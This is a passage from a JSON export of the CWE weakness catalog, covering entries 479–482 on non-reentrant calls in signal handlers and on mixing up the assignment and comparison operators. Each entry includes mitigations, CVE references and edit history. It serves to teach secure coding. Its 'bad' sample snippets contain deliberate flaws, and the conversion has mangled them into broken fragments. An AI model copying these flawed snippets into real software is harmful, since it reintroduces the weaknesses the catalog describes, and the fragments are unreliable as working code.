&#34;Switch Statements&#34;, Page 337"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Failure to Account for Default Case in Switch","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Use Default Case in Switch","attr":{"@_Date":"2009-05-27"}}]}},"479":{"attr":{"@_ID":"479","@_Name":"Signal Handler Use of a Non-reentrant Function","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program defines a signal handler that calls a non-reentrant function.","Extended_Description":{"xhtml:p":["Non-reentrant functions are functions that cannot safely be called, interrupted, and then recalled before the first call has finished without resulting in memory corruption. This can lead to an unexpected system state and unpredictable results with a variety of potential consequences depending on context, including denial of service and code execution.","Many functions are not reentrant, but some of them can result in the corruption of memory if they are used in a signal handler. The function call syslog() is an example of this. In order to perform its functionality, it allocates a small amount of memory as \\"scratch space.\\" If syslog() is suspended by a signal call and the signal handler calls syslog(), the memory used by both of these functions enters an undefined, and possibly, exploitable state. Implementations of malloc() and free() manage metadata in global structures in order to track which memory is allocated versus which memory is available, but they are non-reentrant. Simultaneous calls to these functions can cause corruption of the metadata."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"828","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"663","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"123","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"It may be possible to execute arbitrary code through the use of a write-what-where condition."},{"Scope":"Integrity","Impact":["Modify Memory","Modify Application Data"],"Note":"Signal race conditions often result in data corruption."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Require languages or libraries that provide reentrant functionality, or otherwise make it easier to avoid this weakness."},{"Phase":"Architecture and Design","Description":"Design signal handlers to only set flags rather than perform complex functionality."},{"Phase":"Implementation","Description":"Ensure that non-reentrant functions are not found in signal handlers."},{"Phase":"Implementation","Description":"Use sanity checks to reduce the timing window for exploitation of race conditions. This is only a partial solution, since many attacks might fail, but other attacks still might work within the narrower window, even accidentally.","Effectiveness":"Defense in Depth"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, a signal handler uses syslog() to log a message:","Example_Code":{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"char *message;void sh(int dummy) {}int main(int argc,char* argv[]) {}","xhtml:br":["",""],"xhtml:div":[{"#text":"syslog(LOG_NOTICE,\\"%s\\\\n\\",message);sleep(10);exit(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"...signal(SIGHUP,sh);signal(SIGTERM,sh);sleep(10);exit(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},"If the execution of the first call to the signal handler is suspended after invoking syslog(), and the signal handler is called a second time, the memory allocated by syslog() enters an undefined, and possibly, exploitable state."]}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0893","Description":"signal handler calls function that ultimately uses malloc()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0893"},{"Reference":"CVE-2004-2259","Description":"SIGCHLD signal to FTP server can cause crash under heavy load while executing non-reentrant functions like malloc/free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2259"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Unsafe function call from a signal handler"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"SIG30-C","Entry_Name":"Call only asynchronous-safe functions within signal handlers","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"SIG34-C","Entry_Name":"Do not call signal() from within interruptible signal handlers"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"EXP01-J","Entry_Name":"Never dereference null pointers"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 13, &#34;Signal Vulnerabilities&#34;, Page 791"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Common_Consequences"}],"Previous_Entry_Name":{"#text":"Unsafe Function Call from a Signal Handler","attr":{"@_Date":"2010-12-13"}}}},"480":{"attr":{"@_ID":"480","@_Name":"Use of Incorrect Operator","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The programmer accidentally uses the wrong operator, which changes the application logic in security-relevant ways.","Extended_Description":"These types of errors are generally the result of a typo.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"670","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Sometimes"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Alter Execution Logic","Note":"This weakness can cause unintended logic to be executed and other unexpected application behavior."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":"This weakness can be found easily using static analysis. However in some cases an operator might appear to be incorrect, but is actually correct and reflects unusual logic within the program."},{"Method":"Manual Static Analysis","Description":"This weakness can be found easily using static analysis. However in some cases an operator might appear to be incorrect, but is actually correct and reflects unusual logic within the program."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-140"},"Intro_Text":"The following C/C++ and C# examples attempt to validate an int input parameter against the integer value 100.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int isValid(int value) {}","xhtml:div":{"#text":"if (value=100) {}printf(\\"Value is not valid\\\\n\\");return(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Value is valid\\\\n\\");return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"bool isValid(int value) {}","xhtml:div":{"#text":"if (value=100) {}Console.WriteLine(\\"Value is not valid.\\");return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Console.WriteLine(\\"Value is valid.\\");return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}}],"Body_Text":"However, the expression to be evaluated in the if statement uses the assignment operator \\"=\\" rather than the comparison operator \\"==\\". The result of using the assignment operator instead of the comparison operator causes the int variable to be reassigned locally and the expression in the if statement will always evaluate to the value on the right hand side of the expression. This will result in the input value not being properly validated, which can cause unexpected results."},{"attr":{"@_Demonstrative_Example_ID":"DX-103"},"Intro_Text":"The following C/C++ example shows a simple implementation of a stack that includes methods for adding and removing integer values from the stack. The example uses pointers to add and remove integer values to the stack array variable.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define SIZE 50int *tos, *p1, stack[SIZE];void push(int i) {}int pop(void) {}int main(int argc, char *argv[]) {}","xhtml:br":["","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"p1++;if(p1==(tos+SIZE)) {}*p1 == i;","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// Print stack overflow error message and exit"}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(p1==tos) {}p1--;return *(p1+1);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// Print stack underflow error message and exit"}},"xhtml:br":["",""]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"tos = stack;p1 = stack;...return 0;","xhtml:br":["","","","","",""],"xhtml:i":["// initialize tos and p1 to point to the top of stack","// code to add and remove items from stack"]}}]}},"Body_Text":["The push method includes an expression to assign the integer value to the location in the stack pointed to by the pointer variable.","However, this expression uses the comparison operator \\"==\\" rather than the assignment operator \\"=\\". The result of using the comparison operator instead of the assignment operator causes erroneous values to be entered into the stack and can cause unexpected results."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Using the wrong operator"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP45-C","Entry_Name":"Do not perform assignments in selection statements","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP46-C","Entry_Name":"Do not use a bitwise operator with a Boolean-like operand","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in Computation"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Typos&#34;, Page 289"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Description, Detection_Factors, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Relationships"}],"Previous_Entry_Name":{"#text":"Using the Wrong Operator","attr":{"@_Date":"2008-04-11"}}}},"481":{"attr":{"@_ID":"481","@_Name":"Assigning instead of Comparing","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code uses an operator for assignment when the intention was to perform a comparison.","Extended_Description":"In many languages the compare statement is very close in appearance to the assignment statement and are often confused. This bug is generally the result of a typo and usually causes obvious problems with program execution. If the comparison is in an if statement, the if statement will usually evaluate the value of the right-hand side of the predicate.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"480","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"697","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Alter Execution Logic"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Testing","Description":"Many IDEs and static analysis products will detect this problem."},{"Phase":"Implementation","Description":"Place constants on the left. If one attempts to assign a constant with a variable, the compiler will produce an error."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-140"},"Intro_Text":"The following C/C++ and C# examples attempt to validate an int input parameter against the integer value 100.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int isValid(int value) {}","xhtml:div":{"#text":"if (value=100) {}printf(\\"Value is not valid\\\\n\\");return(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Value is valid\\\\n\\");return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"bool isValid(int value) {}","xhtml:div":{"#text":"if (value=100) {}Console.WriteLine(\\"Value is not valid.\\");return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Console.WriteLine(\\"Value is valid.\\");return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}}],"Body_Text":"However, the expression to be evaluated in the if statement uses the assignment operator \\"=\\" rather than the comparison operator \\"==\\". The result of using the assignment operator instead of the comparison operator causes the int variable to be reassigned locally and the expression in the if statement will always evaluate to the value on the right hand side of the expression. This will result in the input value not being properly validated, which can cause unexpected results."},{"Intro_Text":"In this example, we show how assigning instead of comparing can impact code when values are being passed by reference instead of by value. Consider a scenario in which a string is being processed from user input. Assume the string has already been formatted such that different user inputs are concatenated with the colon character. When the processString function is called, the test for the colon character will result in an insertion of the colon character instead, adding new input separators. Since the string was passed by reference, the data sentinels will be inserted in the original string (CWE-464), and further processing of the inputs will be altered, possibly malformed..","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void processString (char *str) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int i;for(i=0; i&lt;strlen(str); i++) {}","xhtml:br":["",""],"xhtml:div":{"#text":"if (isalnum(str[i])){}else if (str[i] = \':\') {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"processChar(str[i]);","attr":{"@_style":"margin-left:10px;"}},{"#text":"movingToNewInput();}","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}}}},{"Intro_Text":"The following Java example attempts to perform some processing based on the boolean value of the input parameter. However, the expression to be evaluated in the if statement uses the assignment operator \\"=\\" rather than the comparison operator \\"==\\". As with the previous examples, the variable will be reassigned locally and the expression in the if statement will evaluate to true and unintended processing may occur.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void checkValid(boolean isValid) {}","xhtml:div":{"#text":"if (isValid = true) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"System.out.println(\\"Performing processing\\");doSomethingImportant();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.out.println(\\"Not Valid, do not perform processing\\");return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public void checkValid(boolean isValid) {}","xhtml:div":{"#text":"if (isValid) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"System.out.println(\\"Performing processing\\");doSomethingImportant();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.out.println(\\"Not Valid, do not perform processing\\");return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public void checkValid(boolean isValid) {}","xhtml:div":{"#text":"if (!isValid) {}System.out.println(\\"Performing processing\\");doSomethingImportant();","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"System.out.println(\\"Not Valid, do not perform processing\\");return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}}],"Body_Text":["While most Java compilers will catch the use of an assignment operator when a comparison operator is required, for boolean variables in Java the use of the assignment operator within an expression is allowed. If possible, try to avoid using comparison operators on boolean variables in java. Instead, let the values of the variables stand for themselves, as in the following code.","Alternatively, to test for false, just use the boolean NOT operator."]},{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void called(int foo){}int main() {}","xhtml:div":[{"#text":"if (foo=1) printf(\\"foo\\\\n\\");","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"called(2);return 0;","xhtml:br":["",""]}}],"xhtml:br":""}}}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Assigning instead of comparing"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP45-C","Entry_Name":"Do not perform assignments in selection statements","Mapping_Fit":"CWE More Abstract"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Typos&#34;, Page 289"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"}]}},"482":{"attr":{"@_ID":"482","@_Name":"Comparing instead of Assigning","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code uses an operator for comparison when the intention was to perform an assignment.","Extended_Description":"In many languages, the compare statement is very close in appearance to the assignment statement; they are often confused.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"480","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This bug primarily originates from a typo."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity"],"Impact":"Unexpected State","Note":"The assignment will not take place, which should cause obvious program execution problems."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Many IDEs and static analysis products will detect this problem."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"void called(int foo) {}int main() {}","xhtml:div":[{"#text":"foo==1;if (foo==1) System.out.println(\\"foo\\\\n\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"called(2);return 0;","xhtml:br":["",""]}}],"xhtml:br":""}}},{"attr":{"@_Demonstrative_Example_ID":"DX-103"},"Intro_Text":"The following C/C++ example shows a simple implementation of a stack that includes methods for adding and removing integer values from the stack. The example uses pointers to add and remove integer values to the stack array variable.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define SIZE 50int *tos, *p1, stack[SIZE];void push(int i) {}int pop(void) {}int main(int argc, char *argv[]) {}","xhtml:br":["","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"p1++;if(p1==(tos+SIZE)) {}*p1 == i;","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// Print stack overflow error message and exit"}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(p1==tos) {}p1--;return *(p1+1);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// Print stack underflow error message and exit"}},"xhtml:br":["",""]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"tos = stack;p1 = stack;...return 0;","xhtml:br":["","","","","",""],"xhtml:i":["// initialize tos and p1 to point to the top of stack","// code to add and remove items from stack"]}}]}},"Body_Text":["The push method includes an expression to assign the integer value to the location in the stack pointed to by the pointer variable.","However, this expression uses the comparison operator \\"==\\" rather than the assignment operator \\"=\\". The result of using the comparison operator instead of the assignment operator causes erroneous values to be entered into the stack and can cause unexpected results."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Comparing instead of assigning"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP2","Entry_Name":"Unused Entities"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Typos&#34;, Page 289"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content 